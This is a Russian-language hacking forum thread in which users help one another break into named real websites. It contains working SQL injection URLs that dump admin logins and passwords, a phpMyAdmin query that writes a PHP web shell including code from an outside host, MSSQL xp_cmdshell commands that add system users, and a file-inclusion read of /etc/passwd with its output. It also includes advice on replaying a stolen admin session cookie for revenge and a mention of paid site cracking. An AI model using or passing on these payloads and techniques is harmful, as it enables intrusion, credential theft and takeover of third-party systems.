preda1or, a как проверить? на той или нет?
Об этом если честно чего-то не подумал.

Ребята, такой вопрос.
Заливаю шелл через phpmyadmin
Выскакивает ошибка:


В чем косяк? чмода не хвататет? или путь не правильный?
или еще чего-то?

(Errcode: 2) - папка не существует.

'/../../../../shell.php'


Ну правильно, чо это за пусть такой, ты же не "../etc/passwd" подбираешь, тут надо писать реальный абсолютный путь к папке с правами на запись

to R1dex, странно вроде есть такая (: Попробую еще...
to Pashkela, да я полный пишу, просто скрыл путь, что бы не палиццо (: (поправил верхний пост)

Еще вопрос, полный путь у меня такой:

/var/www/vhosts/название сайта/httpdocs/

то есть в INTO OUTFILE так и пишем

/var/www/vhosts/название сайта/httpdocs/images/shell.php

при условии, что папка images имеет нужные нам права.

?

Octave_Parango Запрос покажи полностью. Права есть? Вообще ошибка , как уже сказал R1dex, говорит об несуществующей дирректории. Именно путь, а не права, или что то ещё, но запрос давай посмотрим на всякий случай :)

to jokester,

запрос такой:

CREATE TABLE `she` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `she` ( `shl` ) VALUES ('<?php include("http://название сайте/shell.txt") ?>'); SELECT `shl` FROM `she` INTO OUTFILE `/var/www/vhosts/название сайта/httpdocs/images/shell.php`; DROP TABLE `she`

Где-то накосячил? Да?

Запрос вроде нормальный... Смотри права...

Вряд ли в этой папке "httpdocs" есть права на запись, скорее всего там .htaccess вообще стоит

.htaccess ни имеет никакого отношения.

По возврашаемому коду ошибки ясно что такой диры нет, что бы убедиться в этом попробуй LOAD_FILE какой нибудь файл из этой директории.
Кстати у тебя file_priv есть?

2 Octave_Parango
.htaccess подгрузи да и разберись, так ли оно, как Pashkela сказал...

2 AkyHa_MaTaTa
имхо, не факт, могут всякие извращения стоять...

.htaccess подгрузи да и разберись, так ли оно, как Pashkela сказал...

Не вижу никакой связи между .htaccess и работой с локальной файловой системой посредством MySQL, если только что разве проверить есть ли такая дириктория посредством загрузки .htaccess из той дириктории, хотя в большинстве случаев именно к .htaccess у MySQL узера нет прав на доступ, легчше подгрузить какую нибудь картинку из /images/.

file_priv - есть.
из images - все читается...
Может с путем я че-то накосячил?

file_priv - есть.
из images - все читается...
Может с путем я че-то накосячил?
Да, судя по ошибке, ты накосячил именно с путём. Нету такой диры

Если читается, но не пишется - резонно предположить, что каталог не доступен для записи из под того юзера под кем работает процесс mysql.

Если читается, но не пишется - резонно предположить, что каталог не доступен для записи из под того юзера под кем работает процесс mysql.Не думаю, при таком раскладе помоему будет выкидывать Errcode: 13 , а у него Errcode: 2, а это несуществующая дира, элементарный косяк в написании пути даст такую-же ошибку

Octave_Parango
Чтение ты как осуществлял?

2 AkyHa_MaTaTa
ты прав, я просто на первоначальный вопрос внимания не обратил...
думал мало ли, вдруг он записанные файлы через веб хотел просмотреть...

У меня маленький вопрос по joomla, как узнать какие узеры являються админами, то есть например я выбераю узеров
-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat_ws(0x3A,username,password), 10,11,12,13,14+from+jos_users+limit+3,1/*
как узнать какие из них админы, по +where+gid=25 ?

Если не ошибаюсь gid=25 и gid=24 . Так-же можешь посмотреть поле usertype

Подскажите плз рабочий онлайн сниффер, раньше юзал na-s.ru но сейчас там чтото странное на сайте творится. Нужен сниффер с авторизацией, чтобы кто попало не видел мои логи...

Подскажите плз рабочий онлайн сниффер, раньше юзал na-s.ru но сейчас там чтото странное на сайте творится. Нужен сниффер с авторизацией, чтобы кто попало не видел мои логи...
http://is.kolpeex.com/

http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+or+1=1+order+by+1--+
очень странный скрипт... скуля есть... если зашли в тупик то нажимайте ctrl+r
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+1+from+us ers--+
хз что думаете?

2 sabe:

http://www.gotdotnet.ru/Forums/Web/342101.aspx

Думаю, что просто сайт глючный и не более, чем раскрытие пути:


http://www.sportscn.com/program/vote/vote_result.php?voteid=2

http://www.sportscn.com/program/vote/vote_result.php?voteid=226



т.к. при таких положительных показателях без всяких там кавычек, минусов и % выдает идентичнуюошибку

Pashkela
я знаю английский)) я спросил помочь...
да сайт странный..... выдавать может что угодно незабывай ctrl+r
а вобще скуля есть.. ибо вывод есть на or 1=1

Бугагагага, кхе

http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+or+1=1+group+by+1--
я взламал интернет.
З.Ы. сорри за офф.

AkyHa_MaTaTa
ORA-00979: not a GROUP BY expression

AkyHa_MaTaTa
ORA-00979: not a GROUP BY expression
А мне в фф выкидует исходник страницы:

<?
require("../lib/oci8_plus.inc");
require("../lib/function.inc");
if($voteid=="")
$voteid = 0;
?>
<html>
<head>
<title>»ЄМеµчІй</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="http://www.sportscn.com/css/newspcn.css" rel="stylesheet" type="text/css">
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="473" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="132" height="38" align="center" valign="top" background="http://image.sportscn.com/2006/news/tab_diaocha.jpg" class="a3" style="padding-top:7px">»Є
Ме µч Ій</td>
<td width="341" align="right" valign="bottom" background="http://image.sportscn.com/2006/news/corner_diaocha.jpg"><div style="padding-right:14px"><img src="http://image.sportscn.com/2006/news/sportscn.gif" width="145" height="20"></div></td>
</tr>
<tr>
<td colspan="2" background="http://image.sportscn.com/2006/news/bg_diaocha.gif">
<?
$db=new OCI_PLUS;
$db->open("info");
$strsql = "select votename from comm_vote where voteid=".$voteid;
$db->query($strsql);
$db->movenext();
?>
<table width="450" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="10" align="center">&nbsp;</td>
</tr>
<tr>
<td height="32" align="center"><strong><?=$db->f("votename")?></strong></td>
</tr>
</table>
<table width="450" border="1" align="center" cellpadding="0" cellspacing="0" bordercolorlight="C1C1C1" bordercolordark="ffffff" bgcolor="C1C1C1">
<?
$strsql = "select sum(voteamount) as vote_sum from comm_vote_content where ";
$strsql = $strsql."voteid = ".$voteid;
$db->query($strsql);
$db->movenext();
$vote_sum = $db->f("vote_sum");

$strsql = "select votecontentid,votecontent,voteamount from comm_vote_content ";
$strsql = $strsql."where voteid = ".$voteid." order by votecontentid ASC";
$db->query($strsql);
$count = 0;
while($db->movenext()){
if(($count%2)==0)
$color = "F5F5F5";
else
$color = "EAEAEA";
if ($vote_sum<>0){
$per = number_format(($db->f("voteamount")/$vote_sum),4);
}else{
$per = 0;
}
$tab_width = 250;
?>
<tr bgcolor="<?=$color?>">
<td width="155" height="20" bgcolor="F5F5F5" style="padding-left:5px"><?=$db->f("votecontent")?></td>
<td width="289" style="padding-left:5px"><img src="http://image.sportscn.com/2006/news/diaocha_bar.gif" width="<?=number_format($tab_width*$per,0)?>" height="12" align="absmiddle">&nbsp;&nbsp;&nbsp;<?=($per*100)?>%</td>
</tr>
<?
$count++;
}
?>
<tr bgcolor="<?if(($count%2)==0) echo "F5F5F5";else echo "EAEAEA";?>">
<td height="20" colspan="2" align="center">ДїЗ°№ІУРЈє<?=($vote_sum)?> ИЛІОјУ</td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2"><img src="http://image.sportscn.com/2006/news/bottom_diaocha.gif" width="473" height="13"></td>
</tr>

</table>
</body>
</html>



а вот настройки к бд http://www.sportscn.com/program/lib/oci8_plus.inc

не не к бд, жз че какой то.

AkyHa_MaTaTa Ты не поверишь, но у всех так )
sabe Нет там скули
Исходник
http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=1--
http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=2--
Страница
http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=1--
http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=2--
Исходник
http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=1--
Страница
http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=2--

Логики не вижу , скорее идёт какая-то арифметика с аргументами

http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(u sername)+from+sys.dba_users--

Если не работает с первого раза, нажимайте ctrl+r.

AkyHa_MaTaTa Ты не поверишь, но у всех так )

ну

AkyHa_MaTaTa
ORA-00979: not a GROUP BY expression

Блин, я думал что я зе оне, а оказываеться не так оно :mad: .

http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(u sername)+from+sys.dba_users--

Если не работает с первого раза, нажимайте ctrl+r.
Да жесть :D А объяснить сможешь, почему когда хочет тогда работает :)?

Да жесть :D А объяснить сможешь, почему когда хочет тогда работает :)?

Хацкеры интернет поломали ^^

А если серьезно - хз. У меня иногда и страница: "voteid=1062" с ошибкой вылезает.

R1dex
да ты один меня понял.. +

jokester
я же говоил обнвлять нужно все время.. скрипт видемо некоректный и передает данные с задержкой, возможно не с первого раза изза возникновения ошибок..

что за фигня?)
-1+union+select+1,2,3,4,5,6,7,version(),9 выводит версию 5
-1+union+select+1,2,3,4,5,6,7,version(),9+from+mysq l.user+--+ ругается доступа нет
с помощью SIPT узнал таблы)
все таблы делятся на с префиксом VGB и просто другие
допустим две таблицы VGB_USER и new_data
вот из new_data все выводит а при запросе -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+--+ ничего нет
в чем проблема?)
база одна всего.

А права есть?

Вопрос:
А через phpmyadmin можно посмотреть phpinfo?

2kolpeex к таблице от этого сайта нет доступа?) эт как?)) ошибок не выводит просто нет результата...
даже при таком запросе
=12+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0 x3a,VGB_USER.EMAIL,poll_user.username),9+from+VGB_ USER,poll_user+--+
нет результата

что за фигня?)
-1+union+select+1,2,3,4,5,6,7,version(),9 выводит версию 5
-1+union+select+1,2,3,4,5,6,7,version(),9+from+mysq l.user+--+ ругается доступа нет
с помощью SIPT узнал таблы)
все таблы делятся на с префиксом VGB и просто другие
допустим две таблицы VGB_USER и new_data
вот из new_data все выводит а при запросе -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+--+ ничего нет
в чем проблема?)
база одна всего.
ты не можешь читать таблицы с префиксом VGB, нету прав

2z00MAN вот к mysql.user нет прав) выводится ошибка SELECT command denied to user бла-бла@'localhost' for table 'user'
а када к этим обращаешся нет ни ошибки ни вывода)

j0ker13, посмотри внимательно, может, всё таки не одна бд?
А ещё лучше, дабы избежать ненужных гаданий, кинь линк.

2z00MAN вот к mysql.user нет прав) выводится ошибка SELECT command denied to user бла-бла@'localhost' for table 'user'
а када к этим обращаешся нет ни ошибки ни вывода)
попробуй так -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+limit+1,1+--+

j0ker13, посмотри внимательно, может, всё таки не одна бд?
А ещё лучше, дабы избежать ненужных гаданий, кинь линк.

если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы

сделай где то так

select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns where column_name like '%pass%'
// выбрать название базы + таблицы + колонки где встречается pass

если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы

сделай где то так

select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns where column_name like '%pass%'
// выбрать название базы + таблицы + колонки где встречается pass

1. Это ты мне пишешь? ))
2. Зачем так извращаться, гораздо проще, просто посмотреть в какой бд лежит таблица.

если это 5 ветка, то в information_schema.columns есть колонка table_schema - название базы

сделай где то так

select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns where column_name like '%pass%'
// выбрать название базы + таблицы + колонки где встречается pass
если так делать, то название колонки лучше закодировать в 0xhex, чтобы избежать лишних столкновений с magic_quotes=on

Вопрос:
А через phpmyadmin можно посмотреть phpinfo?
/phpmyadmin/phpinfo.php, но вывод информации может быть запрещен

все снова хай! Надеюсь в этот раз вы мне поможите! )
Есть скуль на сайте, база mssql (юзер sa!)
Пытаюсь вывести имена колонок
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns)--
выводиться имя колонки
nvarchar value 'accid' to data type int
Но имя второй вывести не могу
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid'))--
ncorrect syntax near 'accid'.
Такой вариант тоже не работает
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+(SELECT+TOP+2+COL UMN_NAME+FROM+information_schema.columns))--
Выводит одну и туже колонку
nvarchar value 'AddLine1' to data type

Что делать? Как вывести имена колонок?

accid - переведи в hex. Без ковычек.

Что делать? Как вывести имена колонок?
Юзай лимит.

(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid')+LIMIT+1 ,1)--
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid')+LIMIT+2 ,1)--
SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+('accid')+LIMIT+3 ,1)--
И т.п...

MSSQL не поддерживает LIMIT

не робит ((
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+column_name+not+in+(0x6163636964))--
опять выводит
converting the nvarchar value 'accid' to data type int.

Ты вначале таблицы хоть выведи.

(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--


Получишь что-то типо:

Syntax error converting the nvarchar value 'таблица' to a column of data type int.

(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' таблица'))--

А потом, с нужной таблицы уже выводишь колонки.

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='таблица')-

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='table_name'+AND+C OLU MN_NAME+NOT+IN+('колонка'))--

2z00MANпопробуй так -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+limit+1,1+--+ тоже нет результатов((
2big_BRAT-1+union+select%201,2,3,4,5,6,7,concat_ws(0x3a,tabl e_schema,table_name,column_name%20),9%20from%20inf ormation_schema.columns%20where%20column_name%20li ke%200x70617373 тоже пусто(((

то что я показал это пример, и на твоём конечно может не сработать, лучше брось ссылку, так будет быстрее и нагляднее

R1dex
таблицы я уже вывел

(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name='tblAccounts')--
Incorrect syntax near '''.

(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name=0x74626C4163636F756E7473)--
An expression of non-boolean type specified in a context where a condition is expected, near ')'.

покажи ссыль, мне кажется у тебя так с синтаксисом что-то не то получается...

без ссылки никак?
мне просто этот сайт взломать заказали
а я первый раз с такой хней встречаюсь, до этого сайты c mssql уже ломал
так что с синтаксисом все ok ;)
P.S: кто поможет, % получит! )

перед or поставь '

ты мне? где ты в моем запросе or видел? )

1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema. columns+where+table_name=0x74626C4163636F756E7473)--

Он про это.

Не надо из меня уж совсем то дурака делать, я же говорю ломал уже базы mssql
пробывал я все это уже
1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema.columns+where+table_name='tblAccounts')--
Incorrect syntax near '''.

1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)--
Incorrect syntax near '''.

Не надо из меня уж совсем то дурака делать, я же говорю ломал уже базы mssql

Мы по твоему кто? Экстрасенсы? Мы не можем знать, делал ты так или нет. Если бы кинул ссылку - все было бы гораздо проще.

А то знаешь, как бывает... Помогаешь человеку сделать вывод таблиц из information_schema, и после долгих дискуссий он тебе кидает в личку ссылку, смотришь version()...

ЗЫ: Кинь ссылку в личку.

если есть вывод or 1=@@version, возможно )--+, как уже сказали выше без ссылки можно долго прыгать вокруг скули с бубном
/add попробуй
(select+top+1+column_name+from+information _schema.columns+where+table_name='t')

1 or 1=@@version
Incorrect syntax near '@@version'.
1 or 1=@@version--
Incorrect syntax near '@@version'.

выводит когда просто
site.com/chk/chk.asp?ID=@@version

хорошо, тогда такой вапрос, как добавить юзера через скуль?
mssql - юзер sa

А то я все перевробывал

;exec%20master..xp_cmdshell%20'net%20user%20user%2 0xek%20/add';--
Incorrect syntax near the keyword 'exec'.

1;exec%20master..xp_cmdshell%20'net%20user%20user% 20xek%20/add';--
Incorrect syntax near 'xec'.

1';exec%20master..xp_cmdshell%20'net%20user%20user %20xek%20/add';--
Incorrect syntax near '''.


1%20or%201=;exec%20master..xp_cmdshell%20[net%20user%20user%20xek%20/add];--
An expression of non-boolean type specified in a context where a condition is expected, near 'xec'.

если есть вывод or 1=@@version, возможно )--+, как уже сказали выше без ссылки можно долго прыгать вокруг скули с бубном
/add попробуй
1) (select+top+1+column_name+from+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)
2) (select+top+1+column_name+from+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)--+
3) (select+top+1+column_name+from+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)'--+
разве mssql принимает значения в хексе, начинающиеся с 0x? От фильтрации кавычек помогает char(), но никак не хекс как для MySQL. Сомневаюсь, что дело именно в кавычках, но стоит попробовать так:
(select+top+1+column_name+from+information _schema.columns+where+table_name=CHAR(116)%2BCHAR( 98)%2BCHAR(108)%2BCHAR(65)%2BCHAR(99)%2BCHAR(99)%2 BCHAR(111)%2BCHAR(117)%2BCHAR(110)%2BCHAR(116)%2BC HAR(115))
Кстати в mssql пробел после -- не нужен

челы нужно phppgadmin как r57mysql одним php файлом

и еще вот скуля )
http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1

Подскажите, можно ли такое сделать.

Вывожу инфу:

group_concat(name,0x3a,pass,0x3a,city)
Выплывает это все одной большой партянкой и все слитно, то есть все записи в одной строке через двоеточие, пример:

admin:admin:belmor:root:root:belmor - ну и так далее!

вопрос:

Можно ли вывести информацию, что бы каждая записи выводилась с новой строки:

admin:admin:belmor
root:root:belmor

Thx.

челы нужно phppgadmin как r57mysql одним php файлом

и еще вот скуля )

Это Microsoft Access.

http://www.contecmed.com/cart/product_show.asp?id=38+and+1=1+union+select+1,2,3, 4,5,6,7,8,9,0,11,12+from+news

вопрос:

Можно ли вывести информацию, что бы каждая записи выводилась с новой строки:

admin:admin:belmor
root:root:belmor

Thx.

Хм.. ну попробуй group_concat(name,0x3a,pass,0x3a,city,0x0a)

Не всегда работает..

R1dex, да, что-то не хочет.

и еще вот скуля )
http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1


http://www.contecmed.com/cart/product_show.asp?id=-37+or+1=1+union+select+1,2,3,4,5,6,7,pass,9,user,1 1,12+from+admin
;)

']разве mssql принимает значения в хексе, начинающиеся с 0x? От фильтрации кавычек помогает char(), но никак не хекс как для MySQL. Сомневаюсь, что дело именно в кавычках, но стоит попробовать так:
(select+top+1+column_name+from+information _schema.columns+where+table_name=CHAR(116)%2BCHAR( 98)%2BCHAR(108)%2BCHAR(65)%2BCHAR(99)%2BCHAR(99)%2 BCHAR(111)%2BCHAR(117)%2BCHAR(110)%2BCHAR(116)%2BC HAR(115))
Кстати в mssql пробел после -- не нужен
не обратил внимания (скопировал запрос выше), имелось (предполагалась) ввиду не фильтровация ковычек, а в пропавшая после -- ' <=> near ''' & near 'accid', суть была в том что бы закрыть предыдущее условие/подзапрос; ступил, т.к. можно было его и не закрывать-- (работать с этим условием)
насчет пробела, маслом кашу не испортишь, привычка с mysql ;)

Подскажите, можно ли такое сделать.

Вывожу инфу:

group_concat(name,0x3a,pass,0x3a,city)
Выплывает это все одной большой партянкой и все слитно, то есть все записи в одной строке через двоеточие, пример:

admin:admin:belmor:root:root:belmor - ну и так далее!

вопрос:

Можно ли вывести информацию, что бы каждая записи выводилась с новой строки:

admin:admin:belmor
root:root:belmor

Thx.
SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0×0a) FROM users
SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0x3C62723E) FROM users

привет всем! хочу спросить по поводу php inj, прочитал много статей так и не могу реально взломать сайт..не подскажите как(что нужно) и с чего начать?

gangs, для начала уязвимость надо найти.
А раскрутить это уже второе дело.

ну давай возмём на сайте любую уязвимость...и раскрутим??

Любую? Так зайди в раздел sql инъекции, вот тебе и раскрученная инъекция.
Аналогично с PHP inj.

с sql инъекциями я разобрался....и зачем мне брать уже ломаные меня интересует...самому взломать, но я не могу не получается! вот и прошу чтоб кто нить реально помог раскрутить!
взять любую php inj и раскрутить заново)

Так в чем проблема-то? Если ты читал статьи?

Берём сайт.

http://vitzrotech.com

Находим "интересную" ссылку

http://vitzrotech.com/english/ourproducts/mcb/link.php?file=mcb2.htm

Пробуем:

http://vitzrotech.com/english/ourproducts/mcb/link.php?file=blablabla

Читаем /etc/passwd

http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../etc/passwd

за это спасибо..но есть еще два вопроса....скоко надо поставить ../../../../../../../../../../ после file= , и видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??

за это спасибо..но есть еще два вопроса....скоко надо поставить ../../../../../../../../../../ после file=
чем больше тем лутчше, шучу :) ., /../ - подняться на 1-у дирикторию верх, смотришь скока у тебя от твоего местоположения до требуемой диры ну и ставишь необходимое количество.

чем больше тем лутчше, шучу :) ., /../ - подняться на 1-у дирикторию верх, смотришь скока у тебя от твоего местоположения до требуемой диры ну и ставишь необходимое количество.
спс и за это..понял!! а как на счет этого-- видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??

Свои ссылки с шеллом - это удаленный инклуд, далеко не везде он есть и можно инклудить только локальные файлы, доступные по правам

вот допустим я нашел php inj
http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../etc/passwd

там такая хрень
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin naturemaster:x:500:500::/home/naturemaster:/bin/bash mysql:x:501:501::/usr/local/mysql/var:/sbin/nologin shuvic:x:502:502::/home/shuvic:/bin/bash vitzrotech:x:503:503::/home/vitzrotech:/bin/bash vitzrocell:x:504:504::/home/vitzrocell:/bin/bash naturenet1:x:505:505::/usr/local/apache/htdocs/naturenet.co.kr:/bin/bash vitzronet:x:506:506::/home/vitzronet:/bin/bash

что с ней сделать моно..и есть ли тут админка???

http://ru.wikipedia.org/wiki/Passwd

Помогите с PostgreSQL

Количество подобрал а вот инфу вытянуть не могу *(

http://www.held.co.uk/products/product_detail.php?item_code=2965+union+select+nul l,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,null,null,null,null--


Ой простите поспешил с вопросом ответ сам нашел:

https://forum.antichat.ru/printthread.php?t=40576

http://www.held.co.uk/products/product_detail.php?item_code=2965+union+select+1,v ersion(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,null,null,null,null--

Всем доброго время суток:) В он-лайн игре десант есть уязвимость в админке: http://destrider.ru/admin/
При вводе в поле логин: ¼script¾document.vulnerable=true;¼/script¾
Появляется: require():35->admin_user_get():147->common_get():62
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '=' (/* /admin/index.php */ SELECT * FROM `sys_admin_user` AS t WHERE 1 AND login='¼script¾document.vulnerable=true;¼/script¾ ' AND passwd='d41d8cd98f00b204e9800998ecf8427e' LIMIT 1)
Мне известно что админа логин: admin_sid Мне нужен пас от админки:) Как его достать? Моего друга оскорбили до глубины души и я хочу попакостить им за это... Плиз разясните как пас получить!

дробные спецсимволы не удовлетворяют заданной кодировке, баги там нет, т.к. ковычки слешируется

А что это тогда?

А что это тогда?
Кодировка столбца login - cp1251, а ты UTF-8 туда суешь. Вот и ошибка лезет.

"__utma=34972084.3219761322591926300.1230713575.123 2472568.1232537128.5; __utmz=34972084.1230713575.1.1.utmcsr=andygames.ru |utmccn=(referral)|utmcmd=referral|utmcct=/online/desant.htm; __utmc=34972084; admin_sid=af11060eb5e6df6badfb1b4b77a67968"
Вот куки узнал с помощю файрбаг=) Чё дальше??? И это правильные куки???

Правильные с виду. Вставляй вместо своих и F5

PS: Если кто-то уже не сделал этого раньше тебя, думай, потом выкладывай рабочие куки админа сюда

помогите определить количество столбцов...какой то бред
http://www.technotrade.com.ua/Basket.php?add_prod=true&id_prod=-34%20union%20select%201,2,3,4%20--

челы нужна тузла для слива бд с postgre

помогите пожалуйста, вытащил пароль админа, а он в таком виде ╖rEl╖q kЬ▀╠ У, это что за кодировка? просто никогда с такими вещами не встречался, помогите HELP)))
P.s Логин и Мыло выводяться нормально

помогите определить количество столбцов...какой то бред
http://www.technotrade.com.ua/Basket.php?add_prod=true&id_prod=-34%20union%20select%201,2,3,4%20--

Это не скуля

помогите пожалуйста, вытащил пароль админа, а он в таком виде ╖rEl╖q kЬ▀╠ У, это что за кодировка? просто никогда с такими вещами не встречался, помогите HELP)))

попробуй VnJFbFZxIBJrLIBg

попробуй VnJFbFZxIBJrLIBg
Не подошло ='( Есть ещё варианты?=)

Не подошло ='( Есть ещё варианты?=)
хз...ещё мож так VrElVq

а что за поле?
в хексе пробывал?

дай ссыль..может у тебя кодировка неправильная

А что это? При запросе version() выдаёт следуюшее
PostgreSQL 7.4.23 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

database(),user() не проходят
скуль
http://www.bookzone.com.ua/catalog.php?cid=-11028 UNION SELECT version()

хз...ещё мож так VrElVq

а что за поле?
в хексе пробывал?

дай ссыль..может у тебя кодировка неправильная
это поле password, а остальные поля login, email выводятся с нормальной кодировкой, кодировку я менял всеровно ничего не получается // это полюбому не в Хексе.
P.s щас попробую сам зарегаться и вывести свой пароль в этих кракозябрах=)))

это поле password, а остальные поля login, email выводятся с нормальной кодировкой, кодировку я менял всеровно ничего не получается // это полюбому не в Хексе.
P.s щас попробую сам зарегаться и вывести свой пароль в этих кракозябрах=)))
Кодировка сдесь не причём, гораздо важнее какая база .

В Access такое бывает, какой-то алгоритм хеширования пароля

Если мускул , то или aes_encrypt(скорее всего), или самопис какой-то, по одному значению непонятно. С этим ты ничего не поделаешь, если только ключ угадаешь :)

А что это? При запросе version() выдаёт следуюшее
PostgreSQL 7.4.23 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

database(),user() не проходят
скуль
http://www.bookzone.com.ua/catalog.php?cid=-11028 UNION SELECT version()

Так в чем проблема-то?

http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCH EMA.TABLES+LIMIT+1+OFFSET+0--

Так в чем проблема-то?

http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCH EMA.TABLES+LIMIT+1+OFFSET+0--
спасибо,нашол таблу. я просто не понял что за версия такая

а скажите плиз,как перевести такой пасс ********

TELO в этой таблице нет пассов
http://www.postgresql.org/docs/7.4/static/view-pg-user.html
Ищи другую :)

а скажите плиз,как перевести такой пасс ********

мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"

мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"

Жжешь ))
Сори за оффтоп - не удержался ^^

Как по вашему мнению за что может отвечать переменая сид в урл такого вида posting.php?mode=delete&p=40&sid=790c50da612628e41f4f900a830920c5
Я понимаю может этот вопрос выглядил глупо,просто я пытаюсь осуществить на сайт атаку CSRF!Мне кажется эта переменая мне и мешает пишет мол ошибка сесии!Сильно не ругайте!

За идентификацию сессии и отвечает

Скачай двиг и посмотри исходники, а если по сабжу то sid - session id

Я в пыхе не очень,но понял на счет переменной сид вот что:
